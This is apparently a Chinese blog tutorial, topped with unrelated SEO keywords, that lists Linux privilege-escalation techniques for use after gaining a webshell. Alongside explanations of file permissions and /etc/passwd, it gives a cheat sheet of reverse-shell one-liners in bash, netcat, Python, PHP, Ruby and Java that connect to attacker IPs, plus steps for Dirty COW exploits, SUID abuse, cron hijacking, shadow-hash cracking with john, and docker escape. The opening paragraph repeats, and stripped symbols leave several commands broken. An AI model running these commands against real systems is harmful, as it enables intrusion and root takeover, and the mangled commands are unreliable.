外贸营销型网站2018,wordpress关于页面模板,美丽寮步网站建设哪家好,一个只做百合的网站这里是我写了折磨多提权的指令的总结 我这里毫无保留分享给大家哦 首先神魔是提权
我们完整的渗透测试的流程是(个人总结的) 首先提升权限是我们拿到webshell之后的事情,如何拿到webshell,怎末才能拿到webshell,朋友们等我更新,持续更新中,下一篇更新的是windows提权
好了 废…这里是我写了折磨多提权的指令的总结 我这里毫无保留分享给大家哦 首先神魔是提权
我们完整的渗透测试的流程是(个人总结的) 首先提升权限是我们拿到webshell之后的事情,如何拿到webshell,怎末才能拿到webshell,朋友们等我更新,持续更新中,下一篇更新的是windows提权
好了 废话不多说 我们直入主题
首先我们见到最多的指令
我们输入 ls -al
命令构成
ls这是基础命令用于列出目录内容。它可以显示当前目录或指定目录中的文件和子目录名称。
-a这是一个选项代表 “all”。默认情况下ls 命令不会显示以点.开头的隐藏文件和目录。使用 -a 选项后ls 会列出包括隐藏文件和目录在内的所有内容。隐藏文件和目录通常用于存储系统或应用程序的配置信息。
-l也是一个选项代表 “long format”。使用 -l 选项会以长格式显示文件和目录的详细信息包括文件的权限、硬链接数、所有者、所属组、文件大小、最后修改时间以及文件名。
会得到如下显示
drwxr-xr-x 16 webper webper 4096 2月 24 15:08 .
drwxr-xr-x 9 root root 4096 2月 22 19:46 ..
-rw------- 1 webper webper 652 2月 23 12:53 .bash_history
-rw-r--r-- 1 webper webper 220 4月 5 2019 .bash_logout
-rw-r--r-- 1 webper webper 3637 4月 5 2019 .bashrc
drwx------ 19 webper webper 4096 2月 22 19:34 .cache
drwx------ 18 webper webper 4096 2月 22 19:34 .config
-rw-r--r-- 1 webper webper 25 4月 5 2019 .dmrc
-rw-r--r-- 1 webper webper 8980 4月 5 2019 examples.desktop
drwx------ 3 webper webper 4096 2月 24 15:08 .gconf
-rw------- 1 webper webper 7258 2月 24 15:08 .ICEauthority
drwx------ 3 webper webper 4096 4月 5 2019 .local
drwx------ 4 webper webper 4096 10月 10 2021 .mozilla
-rw------- 1 webper webper 336 10月 11 2021 .mysql_history
-rw-r--r-- 1 webper webper 675 4月 5 2019 .profile
drwx------ 2 webper webper 4096 4月 13 2019 .sunpinyin
-rw------- 1 webper webper 67 2月 24 15:08 .Xauthority
-rw------- 1 webper webper 744 2月 24 15:08 .xsession-errors
-rw------- 1 webper webper 744 2月 24 13:30 .xsession-errors.old
drwxr-xr-x 2 webper webper 4096 4月 5 2019 公共的
drwxr-xr-x 2 webper webper 4096 4月 5 2019 模板
drwxr-xr-x 2 webper webper 4096 4月 5 2019 视频
drwxr-xr-x 2 webper webper 4096 4月 5 2019 图片
drwxr-xr-x 2 webper webper 4096 4月 5 2019 文档
drwxr-xr-x 2 webper webper 4096 4月 5 2019 下载
drwxr-xr-x 2 webper webper 4096 4月 5 2019 音乐
drwxr-xr-x 2 webper webper 4096 4月 5 2019 桌面这每一行是啥意思 我们从左往右看
-rw------- 1 webper webper 652 2月 23 12:53 .bash_history -rw-------
1.这串字符共 10 位每一位都有特定的含义整体上可以分为以下几个部分
第 1 位文件类型标识 -表示这是一个普通文件。除了普通文件还有其他类型的文件标识例如 d代表目录directory。l表示符号链接symbolic link。c字符设备文件通常用于与字符设备如终端进行交互。b块设备文件一般用于与块设备如硬盘进行交互。
第 2 - 4 位文件所有者的权限 r代表读权限read表示文件所有者可以读取该文件的内容。如果是目录意味着可以列出目录中的内容。w代表写权限write表示文件所有者可以修改该文件的内容。对于目录来说意味着可以在目录中创建、删除或重命名文件和子目录。-表示没有执行权限execute。对于普通文件而言没有执行权限意味着不能将其作为可执行程序运行对于目录来说没有执行权限则无法进入该目录。
第 5 - 7 位文件所属组的权限 r表示文件所属组的用户可以读取该文件的内容。-表示文件所属组的用户没有写权限不能修改该文件的内容。-表示文件所属组的用户没有执行权限不能将该文件作为可执行程序运行。
第 8 - 10 位其他用户的权限 r表示除了文件所有者和所属组用户之外的其他用户可以读取该文件的内容。-表示其他用户没有写权限不能修改该文件的内容。-表示其他用户没有执行权限不能将该文件作为可执行程序运行。 当然我们也可以用数字来代替
权限位对应的数值 读权限r对应数值 4写权限w对应数值 2执行权限x对应数值 1无权限-对应数值 0
-rw------- 的数字表示分析 文件所有者权限rw- 表示所有者有读和写权限没有执行权限。读权限4加上写权限2即 4 2 6。文件所属组权限--- 表示所属组没有读、写和执行权限即 0 0 0 0。其他用户权限--- 同样表示其他用户没有读、写和执行权限也是 0 0 0 0。
数字表示结果 将上述三部分的数值组合起来-rw------- 用数字表示就是 600。你可以使用 chmod 命令结合这个数字来设置文件权限例如 收起
bash
chmod 600 your_file 这个命令会将 your_file 的权限设置为 -rw-------即只有文件所有者有读和写权限所属组和其他用户没有任何权限。
2. 1硬链接数 硬链接是文件系统中指向同一个文件数据的多个文件名。这里的 1 表示该文件只有一个硬链接即当前显示的这个文件名是指向该文件数据的唯一引用。
3. webper文件所有者 这表明该文件的所有者是名为 webper 的用户。
4. webper文件所属组 说明该文件属于名为 webper 的用户组。
5. 652文件大小 表示该文件占用的磁盘空间大小为 652 字节。
6. 2月 23 12:53文件最后修改时间 说明该文件最后一次被修改的时间是 2 月 23 日 12 点 53 分。
7. .bash_history文件名 这是文件的名称以 . 开头表示这是一个隐藏文件。.bash_history 文件通常用于记录用户在 bash 终端中执行过的命令历史。 接下来就是反弹shell指令(这个就是需要在我们攻击机上输入的 默认是kail机)
nc -lvnp 8888
如果需要使用bash 反弹 那莫开启监听以前 我们先要输入bash 然后再输入nc -lvnp 8888 nc -lvnp 8888 是一个使用 ncNetcat工具来监听指定端口这里是 8888 端口的命令。Netcat 是一款功能强大的网络工具常被用于网络调试、端口扫描、数据传输等操作。下面详细解释该命令中各个参数的含义以及命令的作用。
命令参数详解 n表示不进行 DNS 反向解析。通常情况下当有连接进来时Netcat 会尝试通过 DNS 把对方的 IP 地址解析为对应的域名使用 -n 参数可以跳过这个解析过程从而加快连接建立的速度同时避免因 DNS 解析失败或延迟带来的问题。l代表监听模式listen mode。正常情况下nc 默认是用于发起连接的但加上 -l 参数后nc 会转变为监听状态等待其他设备主动连接到指定的端口。v表示详细模式verbose mode。启用该参数后Netcat 在运行过程中会输出更详细的信息比如连接的建立、断开以及传输数据的状态等方便用户了解操作的具体情况和排查可能出现的问题。p用于指定监听的端口号。后面需要紧跟具体的端口数字在这个命令里就是 8888意味着 nc 会监听本地的 8888 端口等待外部的连接请求。
命令作用 当你在终端中执行 nc -lvnp 8888 命令后nc 会在本地主机上开启一个监听服务监听 8888 端口。一旦有其他设备尝试连接到本地的 8888 端口nc 会接受这个连接并显示详细的连接信息。之后双方就可以通过这个连接进行数据的传输比如发送文本消息、文件等。
示例 在本地主机上打开一个终端输入以下命令开始监听 8888 端口 bash
nc -lvnp 8888 在另一个设备或者同一个设备的另一个终端窗口中可以使用以下命令连接到该监听端口 bash
nc 本地主机 IP 地址 8888 这里 本地主机 IP 地址 需要替换为实际监听设备的 IP 地址。连接成功后双方就可以互相发送消息进行通信了。
注意事项 监听端口需要相应的权限如果你尝试监听低于 1024 的端口可能需要使用 sudo 来提升权限。确保防火墙允许相应端口的通信否则外部设备可能无法连接到监听端口。你可以通过配置防火墙规则来开放指定端口。 接下来我们开始在目标主机上输入的(这里默认是Linux主机,因为我教的是Linux提权)
1. bash反弹(最常用的)
bash -i /dev/tcp/ip_address/port 01
bash -c bash -i /dev/tcp/192.168.0.189/6666 01
2. nc反弹(最常用的)
nc -e /bin/sh 192.168.2.130 4444
但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 21|nc 10.0.0.1 1234 /tmp/f
3. python
import socket,subprocess,os
s socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(( 192.168.2.130 , 4444 ))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p subprocess.call([ /bin/bash , -i ])
4. php反弹shell
php -r $sockfsockopen(192.168.2.130,4444);exec(/bin/sh -i 3 3 23);
5. ruby反弹shell
ruby -rsocket -efTCPSocket.open(10.0.0.1,1234).to_i;exec sprintf(/bin/sh -i
%d %d 2%d,f,f,f)
6. Java反弹shell
r Runtime.getRuntime()
pr.exec([/bin/bash,-c,exec5/dev/tcp/10.0.0.1/2002;cat5|whileread line; do \$line 25 5; done] asString[])
p.waitFor()
7. xterm反弹shell
xterm -display 10.0.0.1:1 我们在获取(一般都是 www-data)反弹shell之后,终端有些时候系统的命令终端不允许直接访问可以使用python虚拟化一个终端来执行
python -c import pty;pty.spawn(/bin/bash)
python2 -c import pty;pty.spawn(/bin/bash)
python3 -c import pty;pty.spawn(/bin/bash)
然后顺带着解决乱码
我么们输入ctrl z
紧接着 stty -echo raw
然后输入 fg
就可以实现完整的shell 一. 内核溢出 (脏牛提权)
该漏洞是 Linux 内核的内存子系统在处理写时拷贝Copy-on-Write时存在条件竞争漏洞 导致可以破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后利用此漏洞获取 其他只读内存映射的写权限进一步获取 root 权限 使用本地自带的kail搜索exp
searchsploit -t Ubuntu 14.04
searchsploit -s Ubuntu 14.04
searchsploit -s Linux Kernel3.13.0
想查看exp
searchsploit -x linux/local/37088.c
然后复制到本目录
searchsploit -m linux/local/37088.c
然后使用exp
通常使用wget等办法将exp传到受害主机上并按照exp使用方法进行提权借助搜素引擎查阅使用方法通常来说
如果是sh脚本文件赋予权限执行即可如果是c文件通常是需要gcc编译再给编译后的文件赋予权限最后执行 二. suid提权
SUID是赋予文件的一种权限它会出现在文件拥有者权限的执行位上具有这种权限的文件会在其执行时使调用者暂时获得该文件拥有者的权限。也就是如果ROOT用户给某个可执行文件加了S权限那么该执行程序运行的时候将拥有ROOT权限。 SUID设置方法
1、chmod us FILE...
2、chmod u-s FILE… 以下命令可以发现系统上运行的所有SUID可执行文件
find / -perm -us -type f 2/dev/null
find / -user root -perm -4000-print2/dev/null
find / -user root -perm -4000-exec ls -ldb {} \; /表示从文件系统的顶部根开始并找到每个目录
-perm 表示搜索随后的权限
-u s表示查找root用户拥有的文件
-type表示我们正在寻找的文件类型 f表示常规文件而不是目录或特殊文件
2表示该进程的第二个文件描述符即stderr标准错误 搜索文件进行提取
GTFOBins
找到对应的指令
输入进行提权
常见suid提权文件
nmap、vim、find、more、less、bash、cp、Nano、mv、awk、man、weget 三.计划任务提权
当获取一个linux普通用户的时查看计划任务
cat /etc/crontab
查看日志文件
tail -f /var/log/syslog
找到以root身份运行的 我们进行修改为反弹shell
来获取root权限 四.sudo提权
sudo 是一种权限管理机制管理员可以授权于一些普通用户去执行一些 root 执行的操作而不需要知道 root 的密码。
首先通过信息收集查看是否存在sudo配置不当的可能。如果存在寻找低权限sudo用户的密码进而提权。
sudo-l
列出目前用户可执行与无法执行的指令。 可以看到可以使用root特权下的cat命令所以可以读取任何文件(如果cat命令 是以sudo root命令执行的) 五.破解root明文登录提权(john破解shadow root密文登录提权) 大多数linux系统的密码都和/etc/passwd和/etc/shadow这两个配置文件息息相关。passwd里面储存了用户shadow里面是密码的hash。出于安全考虑passwd是全用户可读root可写的。shadow是仅root可读写的。 这里的前提是我们已经对shadow文件 具有可读权限 或者通过其他方式已经获得root权限 我们就可以爆破明文了
我们复制root密码的hash值,存入一个新建的文件(userpassw)里
john会自动检测密文类型 --wordlist 字段文件
john --wordlist/usr/share/wordlists/rockyou.txt userpassw
然后等待破解成功 六.passwd提权
原理是 我们普通用户对 /etc/passwd 具有写入权限 导致我们写入
我们就可以新建伪造的root用户 还要莫就是 /etc/passwd里边不小心存储了root密码的hash值
我们就可以进行john破解密码进行登录
七.shadow提权
就是我们普通用户可以访问 /etc/shadow文件 拿到root密码的hash 然后进行暴力破解
八.docker提权
关于docker提权逃逸提权
默认情况下Docker 软件包是会默认添加一个 docker 用户组的。Docker 守护进程会允许 root 用户和 docker组用户访问 Docker给用户提供 Docker 权限 用户在创建一个docker容器后容器内默认是root账户在不需要加sudo的情况下可以任意更改容器内的配置。 正常情况下这种模式既可以保证一台机器被很多普通用户使用通过docker容器的隔离相互之前互不影响也给用户在容器内开放了充足的权限保证用户可以正常安装软件修改容器配置等操作。 普通用户如果要想使用 docker而且不想给 sudo 权限那么一般会选择把该用户加入 docker 用户组内同时在 docker 容器内是具有 root 权限的这样保证了用户对容器的完全控制
输入命令下载使用容器把容器的目录挂载到宿主的根目录
九.第三方组件提权(linux mysql udf提权)
如果在linux中 存在mysql 可以试用mysql提权 但是几率不会太大
udf提权通过在mysql中添加自定义函数来执行系统命令。效果是从 mysql权限 — 系统权限 最后有三个提权脚本应用
LinEnum(啥都输出)
linuxprivchecker(啥都输出)
linux-exploit-suggester2(针对内核) 还有我们etc/passwd 文件 里的含义 文件格式 /etc/passwd 文件中的每一行代表一个用户账户信息不同字段之间使用冒号:分隔每行通常包含 7 个字段格式如下 收起
plaintext
username:password:UID:GID:GECOS:home_directory:shell
各字段详细解释
1. username用户名 这是用户登录系统时使用的名称通常是唯一的用于标识不同的用户。它由字母、数字、下划线等字符组成是用户与系统进行交互的身份标识。例如常见的系统用户 root 就是一个用户名。
2. password密码 在现代系统中该字段通常显示为 x表示密码已经被加密并存储在 /etc/shadow 文件中。/etc/shadow 文件具有更高的安全性只有 root 用户可以访问。在早期的系统中该字段会直接存储加密后的密码。
3. UID用户标识符 这是一个唯一的整数用于在系统内部标识用户。每个用户在系统中都有一个唯一的 UID普通用户的 UID 通常从 1000 开始递增而 root 用户的 UID 固定为 0。系统在进行权限管理和资源分配时会根据 UID 来识别用户。
4. GID组标识符 它表示用户所属的主要用户组的标识符。与 UID 类似GID 也是一个唯一的整数用于在系统中标识用户组。用户所属的主要组信息存储在 /etc/group 文件中。当用户创建文件或目录时默认情况下这些文件或目录的所属组就是该用户的主要组。
5. GECOS用户信息 该字段通常包含用户的一些额外信息如用户的全名、办公室位置、联系电话等。这些信息不是必需的有些系统可能会将其留空或只填写部分信息。不同字段之间使用逗号,分隔。
6. home_directory用户主目录 这是用户登录系统后默认进入的目录。每个用户都有自己的主目录用于存储个人文件和配置信息。例如普通用户的主目录通常位于 /home 目录下如 /home/username而 root 用户的主目录是 /root。
7. shell用户登录 shell 它指定了用户登录系统后默认使用的命令行解释器。常见的 shell 有 bash、sh、zsh 等。如果该字段为空或设置为 /sbin/nologin则表示该用户不能登录系统通常用于系统服务账户。
示例 以下是 /etc/passwd 文件中的一行示例 收起
plaintext
john:x:1001:1001:John Doe,Room 101,555-1234:/home/john:/bin/bash 这行记录表示 用户名是 john。密码存储在 /etc/shadow 文件中。UID 是 1001。GID 是 1001。用户的全名是 John Doe办公室位于 Room 101联系电话是 555 - 1234。主目录是 /home/john。默认使用的 shell 是 /bin/bash。
